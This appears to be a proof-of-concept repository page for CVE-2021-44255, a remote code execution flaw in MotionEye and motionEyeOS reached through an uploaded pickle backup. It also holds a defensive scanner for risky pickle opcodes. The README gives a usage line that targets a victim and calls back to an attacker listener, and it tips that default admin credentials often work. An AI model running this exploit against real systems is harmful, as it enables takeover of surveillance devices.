CVE-2021-44255 PoC: motionEyeOS and MotionEye-Project MotionEye access control error vulnerability

Source
Associated Vulnerability
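Title: motionEyeOS and MotionEye-Project MotionEye access control error vulnerability (CVE-2021-44255)
Description: motionEyeOS and MotionEye-Project MotionEye are both products of the individual developer Calin Crisan. motionEyeOS is a video surveillance operating system for single-board computers. MotionEye-Project MotionEye is a web-based frontend for motion. MotionEye <= 0.42.1 and motionEyeOS <= 20200606 contain an access control error vulnerability. It stems from an authenticated remote code execution flaw that lets a remote attacker upload a configuration backup file containing a malicious Python pickle file, which will, on the ser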
Description
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. CVE-2021-44255
Readme
# MotionEye/MotionEyeOS Authenticated RCE
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator credentials, so it should not be that big of a deal. Unfortunately, MotionEye/MotionEyeOS can frequently be found running with default credentials. 

Example:

```
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
```

Both victim and attacker are given in the form ip:port; the port can be left out when it is 80. The script uses the default username of admin with a blank password. There are also CLI options for alternate usernames/passwords. Please see the code for more details.

CVE-2021-44255

See https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye for a writeup on this and other issues. 
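
On the defensive side, a backup can be inspected before it is restored. The sketch below is an added example, not code from this repository or from MotionEye: it assumes the backup is a tar archive and applies an assumed policy of rejecting any `.pickle` member whose opcode stream imports or calls an object. It disassembles the pickle with `pickletools` and never unpickles it; all function names and sample files are hypothetical and constructed.

```python
from __future__ import annotations
import collections, io, pickle, pickletools, tarfile

# Opcodes that make the unpickler import a name or call/instantiate an object.
RISKY_OPS = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE"}

def risky_opcodes(data: bytes) -> list[str]:
    """List risky opcodes in a pickle stream by disassembling it (never unpickles)."""
    try:
        return [op.name for op, _arg, _pos in pickletools.genops(data) if op.name in RISKY_OPS]
    except Exception:  # truncated or corrupt stream: treat as untrusted
        return ["MALFORMED"]

def scan_backup(archive: bytes) -> dict[str, list[str]]:
    """Map every *.pickle member of a tar backup to the risky opcodes it contains."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for member in tar:
            if member.isfile() and member.name.endswith(".pickle"):
                report[member.name] = risky_opcodes(tar.extractfile(member).read())
    return report

def safe_to_restore(archive: bytes) -> bool:
    """Assumed policy: reject a backup if any pickle member imports or calls anything."""
    return not any(scan_backup(archive).values())

def build_archive(files: dict[str, bytes]) -> bytes:
    """Pack in-memory files into a gzip tar (used only to build the constructed samples)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def constructed_samples() -> tuple[bytes, bytes]:
    """Two constructed backups: a data-only pickle vs. one that references a class."""
    plain = pickle.dumps([(1633770000, "cleanup", ("a", 1))])
    with_object = pickle.dumps(collections.OrderedDict(a=1))  # harmless, but imports a class
    conf = b"# constructed placeholder config\n"
    return (build_archive({"example.conf": conf, "tasks.pickle": plain}),
            build_archive({"example.conf": conf, "tasks.pickle": with_object}))

if __name__ == "__main__":
    for archive in constructed_samples():
        print(scan_backup(archive), "restore" if safe_to_restore(archive) else "reject")
```

A pickle written by the application itself may legitimately reference its own functions, so a stricter alternative is to drop pickle members from uploaded backups entirely.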
File Snapshot

[4.0K] /data/pocs/c56c0f1726870c926296af2ce30ff8edec1c5387
├── [5.1K] main.py
└── [ 774] README.md

0 directories, 2 files